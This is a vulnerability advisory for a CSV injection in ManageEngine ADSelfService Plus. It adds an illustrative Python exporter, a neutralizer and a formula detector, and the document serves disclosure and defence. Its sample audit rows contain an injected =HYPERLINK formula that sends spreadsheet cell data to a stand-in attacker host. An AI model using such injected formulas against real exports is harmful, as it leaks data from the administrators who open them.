CVE-2021-33256
CVE-2021-33256 is a high-severity vulnerability with a CVSS v3.1 base score of 8.8. It is a CSV injection on the login panel of ManageEngine ADSelfService Plus Version 6.1 Build 6101 that an unauthenticated user can trigger: the j_username parameter is reported as vulnerable, and a reverse shell could be obtained if a privileged user later exports the "User Attempts Audit Report" as a CSV file and opens it in a spreadsheet. EPSS estimates a 79.00% chance of exploitation in the next 30 days.
Description
A CSV injection vulnerability on the login panel of ManageEngine ADSelfService Plus Version: 6.1 Build No: 6101 can be exploited by an unauthenticated user. The j_username parameter seems to be vulnerable and a reverse shell could be obtained if a privileged user exports the "User Attempts Audit Report" as a CSV file. Note: The vendor disputes this vulnerability, claiming "This is not a valid vulnerability in our ADSSP product. We don't see this as a security issue at our side."
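The mechanism behind the description is generic to any audit export: a value the attacker controls (here, whatever is submitted as j_username in a failed login) is written verbatim into a CSV, and a spreadsheet evaluates any cell that starts with a formula trigger when an administrator opens the file. The example below is added here to illustrate that path and the usual mitigation; it is not code from ADSelfService Plus or from the advisory, and the column layout of the report and the sample rows are constructed assumptions. It contrasts a vulnerable exporter with one that neutralizes formula-like cells, and includes a detector that scans an exported CSV for cells a spreadsheet would evaluate.

```python
import csv
import io

# Leading characters that Excel and LibreOffice treat as the start of a formula
# (per OWASP's CSV injection guidance). Tab and CR are included because they can
# terminate a cell and let the next field begin with a trigger.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Make one cell safe for a CSV that will be opened in a spreadsheet by
    prefixing formula-like values with a single quote, which forces the cell to
    be read as text. Embedded double quotes are handled by csv.writer's quoting."""
    text = "" if value is None else str(value)
    if is_formula_like(text):
        text = "'" + text
    return text


def export_report(rows, neutralize: bool) -> str:
    """Write audit rows to CSV text. With neutralize=False this is the pattern
    the advisory describes: attacker-supplied usernames written verbatim."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["Username", "Timestamp", "Status"])
    for row in rows:
        cells = [row["username"], row["timestamp"], row["status"]]
        if neutralize:
            cells = [neutralize_cell(c) for c in cells]
        writer.writerow(cells)
    return buf.getvalue()


def formula_cells(csv_text: str):
    """Detection: parse an exported CSV and return (row, column, value) for
    every cell a spreadsheet would evaluate. Usable as a check on files before
    they are opened, or as a test oracle for an exporter."""
    hits = []
    for r, record in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(record):
            if is_formula_like(cell):
                hits.append((r, c, cell))
    return hits


# Constructed sample login-attempt audit rows (not data from the product).
# The second and third usernames are the kind of value an unauthenticated
# client can submit as j_username: the account need not exist, the failed
# attempt alone is what gets logged and later exported.
SAMPLE_ROWS = [
    {"username": "jsmith",
     "timestamp": "2021-05-20 10:14:02", "status": "Success"},
    {"username": '=HYPERLINK("http://attacker.invalid/?"&A1,"click me")',
     "timestamp": "2021-05-20 10:15:41", "status": "Failure"},
    {"username": "-2+3",
     "timestamp": "2021-05-20 10:16:07", "status": "Failure"},
]

if __name__ == "__main__":
    vulnerable = export_report(SAMPLE_ROWS, neutralize=False)
    hardened = export_report(SAMPLE_ROWS, neutralize=True)
    print("formula cells in vulnerable export:", formula_cells(vulnerable))
    print("formula cells in hardened export:", formula_cells(hardened))
```

Two caveats for anyone applying this to a real export: the single-quote prefix is visible in the sheet and will also be applied to legitimate negative numbers and phone numbers written with a leading "+" or "-", so it belongs on free-text columns such as usernames rather than on numeric ones; and neutralizing on export does not remove the attacker-controlled string from the audit store, so the same defence must be applied to every other report path that renders it.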
Metrics
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Weakness Enumeration
Affected Software
| Vendor | Product | Versions | Update |
|---|---|---|---|
| Zohocorp | Manageengine Adselfservice Plus | 6.1 | 6101 |
References
- https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection (Exploit, Third Party Advisory)
Source: NVD / NIST
